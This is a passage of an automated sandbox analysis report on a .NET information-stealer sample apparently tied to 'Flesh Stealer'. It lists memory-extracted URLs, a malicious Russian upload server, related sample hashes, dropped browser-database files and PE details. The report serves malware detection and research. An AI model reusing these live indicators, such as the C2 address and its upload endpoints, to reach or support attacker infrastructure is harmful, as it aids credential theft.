                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchiGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/ac/?q=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoiGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssiGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED89000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://orange-loris-425181.hostingersite.comiGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED31000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://t.me/FleshStealeriGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.rootca1.amazontrust.com/rootca1.crl0iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.pki.goog/gtsr1/gtsr1.crl0WiGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.rootca1.amazontrust.com0:iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://pki.goog/repository/0iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.ecosia.org/newtab/iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://icanhazip.com/piGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://pki.goog/repo/certs/gtsr1.der04iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://ac.ecosia.org/autocomplete?q=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.comiGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F283000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F232000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_alldp.icoiGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://x1.c.lencr.org/0iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://x1.i.lencr.org/0iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.tmp7AB1.tmp.dat.0.drfalse
                                                        		high
                                                        http://www.quovadis.bm0iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605CFC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://icanhazip.comiGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://support.mozilla.orgtmp7AB1.tmp.dat.0.drfalse
                                                            		high
                                                            https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firetmp7AB1.tmp.dat.0.drfalse
                                                              		high
                                                              https://ocsp.quovadisoffshore.com0iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605CFC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameiGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://gemini.google.com/app?q=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    89.23.100.233
                                                                    		unknownRussian Federation
                                                                    		48687MAXITEL-ASRUtrue
                                                                    104.16.185.241
                                                                    		icanhazip.comUnited States
                                                                    		13335CLOUDFLARENETUSfalse
                                                                    84.32.84.100
                                                                    		free.cdn.hstgr.netLithuania
                                                                    		33922NTT-LT-ASLTfalse

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1569093
                                                                    Start date and time:2024-12-05 13:08:52 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 6m 51s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                    Run name:Suspected VM Detection
                                                                    Number of analysed new started processes analysed:7
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Sample name:iGxCM2I5u9.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@10/2@3/3
                                                                    EGA Information:Failed
                                                                    HCA Information:Failed
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                                                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                    • Execution Graph export aborted for target iGxCM2I5u9.exe, PID 7544 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • VT rate limit hit for: iGxCM2I5u9.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    07:11:09API Interceptor4758383x Sleep call for process: iGxCM2I5u9.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    89.23.100.233T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233:1488/upload
                                                                    3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233:1489/upload
                                                                    VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233:1488/upload
                                                                    104.16.185.2413K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                                    • icanhazip.com/
                                                                    K6aOw2Jmji.exeGet hashmaliciousStealeriumBrowse
                                                                    • icanhazip.com/
                                                                    jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                                                    • icanhazip.com/
                                                                    VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                                                    • icanhazip.com/
                                                                    L814CyOxMT.exeGet hashmaliciousFlesh Stealer, PureLog Stealer, zgRATBrowse
                                                                    • icanhazip.com/
                                                                    GsZkXAmf61.exeGet hashmaliciousCelestial Rat, EICARBrowse
                                                                    • icanhazip.com/
                                                                    REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                    • icanhazip.com/
                                                                    Company profile.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                    • icanhazip.com/
                                                                    RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                    • icanhazip.com/
                                                                    HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                    • icanhazip.com/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    free.cdn.hstgr.netFmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                    • 84.32.84.136
                                                                    https://ohpky5.fj78.fdske.com/e/c/01jbx9w45rt8n7dv9hga5bx34b/01jbx9w45rt8n7dv9hgd1yw31dGet hashmaliciousUnknownBrowse
                                                                    • 84.32.84.121
                                                                    http://zip.lu/?redirect=3k7wIGet hashmaliciousUnknownBrowse
                                                                    • 84.32.84.104
                                                                    https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/Get hashmaliciousUnknownBrowse
                                                                    • 84.32.84.197
                                                                    http://zip.lu/?redirect=3k7wIGet hashmaliciousUnknownBrowse
                                                                    • 84.32.84.227
                                                                    https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/Get hashmaliciousUnknownBrowse
                                                                    • 93.127.179.137
                                                                    e0OOofAl0S.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                                                    • 191.96.144.157
                                                                    oZB7n3wuNk.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                                                    • 84.32.84.152
                                                                    mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                                                    • 185.77.97.68
                                                                    icanhazip.comT05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.16.184.241
                                                                    3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.16.185.241
                                                                    VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.16.184.241
                                                                    Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                    • 104.16.184.241
                                                                    gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                    • 104.16.184.241
                                                                    K6aOw2Jmji.exeGet hashmaliciousStealeriumBrowse
                                                                    • 104.16.185.241
                                                                    uyz4YPUyc9.exeGet hashmaliciousStealeriumBrowse
                                                                    • 104.16.184.241
                                                                    yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                    • 104.16.184.241
                                                                    jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                                                    • 104.16.185.241
                                                                    5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                                                    • 104.16.184.241

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUShttps://forms.zohopublic.com/volt1g1/form/CompleteVehicleAccessoriesLtd/formperma/DjGG5qUda3jrtGBWWHgY7RiBMK57TQ9IEa34k6QF6G0Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.18.95.41
                                                                    z21nfe_20231205_001.vbsGet hashmaliciousUnknownBrowse
                                                                    • 104.21.93.68
                                                                    7Gt3icFvQW.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.12.205
                                                                    1AxSwjpyGp.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                    • 104.26.12.205
                                                                    V5P3YggUcy.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 172.67.181.192
                                                                    FPBKcOFjEP.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                    • 104.26.12.205
                                                                    V5P3YggUcy.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 172.67.181.192
                                                                    https://t.ly/HThl-Link1-0312Get hashmaliciousUnknownBrowse
                                                                    • 104.20.7.133
                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 104.21.16.9
                                                                    LiteDBViewer.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 172.67.181.192
                                                                    MAXITEL-ASRUT05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233
                                                                    3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233
                                                                    VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233
                                                                    Installer_setup32_64x.exeGet hashmaliciousLummaC, StealcBrowse
                                                                    • 89.23.96.109
                                                                    9fGsCDYKLV.exeGet hashmaliciousFlesh StealerBrowse
                                                                    • 89.23.100.233
                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                    • 89.23.100.233
                                                                    file.exeGet hashmaliciousFlesh StealerBrowse
                                                                    • 89.23.100.233
                                                                    L814CyOxMT.exeGet hashmaliciousFlesh Stealer, PureLog Stealer, zgRATBrowse
                                                                    • 89.23.100.233
                                                                    vbe11TPn2x.exeGet hashmaliciousFlesh StealerBrowse
                                                                    • 89.23.100.233
                                                                    Ham9SAD0Ou.docGet hashmaliciousUnknownBrowse
                                                                    • 89.23.98.98
                                                                    NTT-LT-ASLTSRT68.exeGet hashmaliciousFormBookBrowse
                                                                    • 84.32.84.32
                                                                    http://editableslides.coGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                    • 84.32.84.208
                                                                    Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                    • 84.32.84.32
                                                                    SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                    • 84.32.84.32
                                                                    attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                    • 84.32.84.32
                                                                    loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                    • 84.32.53.129
                                                                    attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 84.32.84.32
                                                                    DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 84.32.84.32
                                                                    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 84.32.51.16

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0ez21nfe_20231205_001.vbsGet hashmaliciousUnknownBrowse
                                                                    • 84.32.84.100
                                                                    7Gt3icFvQW.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 84.32.84.100
                                                                    1AxSwjpyGp.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                    • 84.32.84.100
                                                                    V5P3YggUcy.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 84.32.84.100
                                                                    FPBKcOFjEP.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                    • 84.32.84.100
                                                                    V5P3YggUcy.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 84.32.84.100
                                                                    LiteDBViewer.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 84.32.84.100
                                                                    MerchantDetailedStatement_37063_04122024.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 84.32.84.100
                                                                    MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                                    • 84.32.84.100

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Temp\tmp7AB1.tmp.dat

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\iGxCM2I5u9.exe
                                                                    File Type:SQLite 3.x database, user version 57, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 2, database pages 41, cookie 0x21, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):5242880
                                                                    Entropy (8bit):0.035631294721445904
                                                                    Encrypted:false
                                                                    SSDEEP:192:bZjnkYjcoBMcygNDI7oslTYBIQg6Ism2Vspvp0:bZTVTBMcygNDuT1l62p
                                                                    MD5:59E4A8110FA2BCC012E341B93E96E93D
                                                                    SHA1:EE08810B0CE857F01170C08A24B9D438B64D577D
                                                                    SHA-256:3A85F2FC349A7E431EA6F1FC4568C99C1918D478AD6FE6445D560EF00395DB40
                                                                    SHA-512:2AD00B0FCBE4FC37ECAA68C16BE32A904D682A23ACF5B39BCECF5DC280E23933FDD5A0D2A92A45F2C77618CA7466334AFEB1EAA7EA07BF4E043282B31039E8FF
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:SQLite format 3......@ .......)...........!...................9..................................S`....(e......}$|.|N{.{sz.z{z.yAx.x!w.v.wZu7tNt.s.s\r.rJq.p.q.p.o.o.o.m.mal&k.k.g.g3f.f.e.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\tmp7AB2.tmp.dat

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\iGxCM2I5u9.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08231524779339361
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:886A5F9308577FDF19279AA582D0024D
                                                                    SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                                    SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                                    SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):5.581328681783163
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                    File name:iGxCM2I5u9.exe
                                                                    File size:288'768 bytes
                                                                    MD5:8c6fb38b219a123b9340465b8d2dd5f8
                                                                    SHA1:35242280f551684b9e47726d5f94f1615c0dc76e
                                                                    SHA256:2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c
                                                                    SHA512:dd33b0934cfb262862b388b843c2ff13637c0cc1b75b7e7a8cb1640a3d39066e9681137b6ff68545eeb9a0850f23c24b470963520852f51d8644cd9de74768dd
                                                                    SSDEEP:6144:VvzIeMWcsLDGfFYiudGV0LkB/dQs7XJBCIX8boS7ZS/5iEl:V7xH5upVB+4XJBCIXc7O5i
                                                                    TLSH:4E542B3BABE54805F1EE9A7DCD9E1B62CB65D1022805B353BA436166AD01FFCEC0B0D5
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}............."...0..^...........}... ........@.. ....................................`................................

                                                                    File Icon

                                                                    Icon Hash:90cececece8e8eb0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x447dce
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x9A13B17D [Thu Nov 30 18:31:25 2051 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
